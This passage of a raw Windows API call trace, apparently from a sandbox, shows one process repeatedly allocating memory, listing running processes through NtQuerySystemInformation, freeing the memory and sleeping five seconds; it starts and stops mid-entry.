returned 0x0 [0217.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.479] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.576] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.584] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.599] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 